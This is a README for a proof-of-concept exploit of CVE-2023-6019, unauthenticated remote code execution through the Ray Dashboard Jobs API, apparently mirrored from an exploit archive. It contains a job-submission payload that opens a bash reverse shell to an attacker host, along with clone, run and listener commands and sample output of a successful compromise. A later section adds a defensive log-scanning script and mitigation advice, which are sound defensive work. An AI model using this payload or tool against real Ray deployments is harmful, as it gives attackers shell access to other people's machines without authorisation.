## https://sploitus.com/exploit?id=B7F3888A-67A2-5DAE-904A-1F178F5B69DD
# CVE-2023-6019 - Anyscale Ray Dashboard Unauthenticated RCE
> PoC exploit for CVE-2023-6019: Remote Code Execution via the unauthenticated Ray Dashboard Jobs API.
> Made by **oguiii**
---
## Description
[Anyscale Ray](https://www.ray.io/) is an open-source framework for distributed ML/AI workloads. Versions **prior to 2.6.4** expose a Jobs submission API through the Ray Dashboard (default port `8265`) **without any authentication**, allowing an unauthenticated attacker to submit arbitrary jobs and achieve **Remote Code Execution** on the host.
- **CVE:** CVE-2023-6019
- **Severity:** Critical (CVSS 9.8)
- **Affected versions:** Ray < 2.6.4
- **Attack surface:** `POST /api/jobs/` on the Ray Dashboard port (`8265`)

The job-submission request sent by the PoC (only the tail of the request survives on this page; the `entrypoint` field is where the command runs):

```http
:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}
```
---
## Usage
```bash
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <target> -p <port> -l <attacker-ip> -lp <attacker-port>
```
### Arguments
| Flag | Description | Default |
|------|-------------|---------|
| `-t` | Target IP or hostname | required |
| `-p` | Ray Dashboard port | `8265` |
| `-l` | Attacker IP (reverse shell) | required |
| `-lp` | Attacker port (reverse shell) | required |
### Example
```bash
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
```
### Expected output
```
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019
[*] Target : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...
[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc
[>] Make sure your listener is ready:
nc -lvnp 4444
```
---
## Detection
Look for unexpected `POST` requests to `/api/jobs/` on port `8265` in your HTTP logs or network traffic. A `GET /api/version` from the same source immediately beforehand (the version probe shown in the expected output above) is a useful corroborating signal, as is any job submission from a host that is not one of your known job-submission clients.
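A defender-side check for the signal described above, as an added example that is not part of the PoC repository or of Ray itself. It scans access-log lines for `POST` requests to the Jobs API on the Dashboard port and notes whether the same source first hit `/api/version`. The log lines are constructed; the layout (combined log format with the upstream server port appended as a trailing field, the way a reverse proxy in front of the Dashboard can be configured to log) is an assumption, so adjust `LINE_RE` to your own log format.

```python
"""Flag Ray Dashboard job submissions in access logs (added example, not PoC code)."""
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample lines: combined log format with the upstream port appended.
# Line 2 and line 4 are job submissions on the Dashboard port; line 5 hits a
# different port and line 3 is a harmless job listing (GET).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2023:10:01:02 +0000] "GET /api/version HTTP/1.1" 200 91 "-" "python-requests/2.31.0" 8265
10.0.0.5 - - [12/Nov/2023:10:01:03 +0000] "POST /api/jobs/ HTTP/1.1" 200 58 "-" "python-requests/2.31.0" 8265
10.0.0.7 - - [12/Nov/2023:10:02:11 +0000] "GET /api/jobs/ HTTP/1.1" 200 1204 "-" "Mozilla/5.0" 8265
10.0.0.9 - - [12/Nov/2023:10:03:40 +0000] "POST /api/jobs/?x=1 HTTP/1.1" 200 58 "-" "python-requests/2.28.1" 8265
10.0.0.9 - - [12/Nov/2023:10:04:00 +0000] "POST /api/jobs/ HTTP/1.1" 404 0 "-" "curl/8.0.1" 8080
"""

# Assumed log layout: src ident user [ts] "METHOD path proto" status bytes "ref" "ua" port
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" (?P<port>\d+)$'
)

DASHBOARD_PORT = 8265          # Ray Dashboard default port
JOBS_PATH = "/api/jobs"        # job submission endpoint, compared without trailing slash
VERSION_PATH = "/api/version"  # probed by the PoC before it submits a job


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one log line, or None if it does not match the layout."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def normalize_path(path: str) -> str:
    """Drop the query string and trailing slash so /api/jobs/?x=1 and /api/jobs compare equal."""
    return path.split("?", 1)[0].rstrip("/") or "/"


def find_job_submissions(
    lines: Iterable[str],
    dashboard_port: int = DASHBOARD_PORT,
    trusted_sources: Iterable[str] = frozenset(),
) -> List[Dict[str, object]]:
    """Return one alert per POST to the Jobs API on the Dashboard port from an untrusted source.

    Each alert records whether the same source address already requested
    /api/version earlier in the log, which is the PoC's fingerprint.
    """
    trusted = set(trusted_sources)
    version_probes = set()
    alerts: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or int(rec["port"]) != dashboard_port:
            continue
        path = normalize_path(rec["path"])
        if rec["method"] == "GET" and path == VERSION_PATH:
            version_probes.add(rec["src"])
            continue
        if rec["method"] == "POST" and path == JOBS_PATH and rec["src"] not in trusted:
            alerts.append({
                "src": rec["src"],
                "time": rec["ts"],
                "user_agent": rec["ua"],
                "accepted": rec["status"].startswith("2"),  # 2xx means the job was taken
                "preceded_by_version_probe": rec["src"] in version_probes,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_job_submissions(SAMPLE_LOG.splitlines()):
        print(alert)
```

Pass the addresses of your legitimate job-submission clients (CI runners, the head node itself) as `trusted_sources` so that routine submissions do not page anyone; everything else that reaches the Jobs API on the Dashboard port is worth a look, with the version-probe flag as a tiebreaker. The Dashboard itself does not write logs in this layout, so this is meant to run over reverse-proxy or network-capture HTTP logs.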
---
## Mitigation
- Upgrade to **Ray >= 2.6.4**
- Restrict access to the Ray Dashboard port (8265) via firewall rules
- Do not expose Ray Dashboard to public networks
---
## References
- https://nvd.nist.gov/vuln/detail/CVE-2023-6019
- https://www.anyscale.com/
- https://github.com/ray-project/ray
---
## Disclaimer
> This tool is intended for **authorized penetration testing and educational purposes only**.
> The author is not responsible for any misuse or damage caused by this tool.
> Always obtain proper written authorization before testing.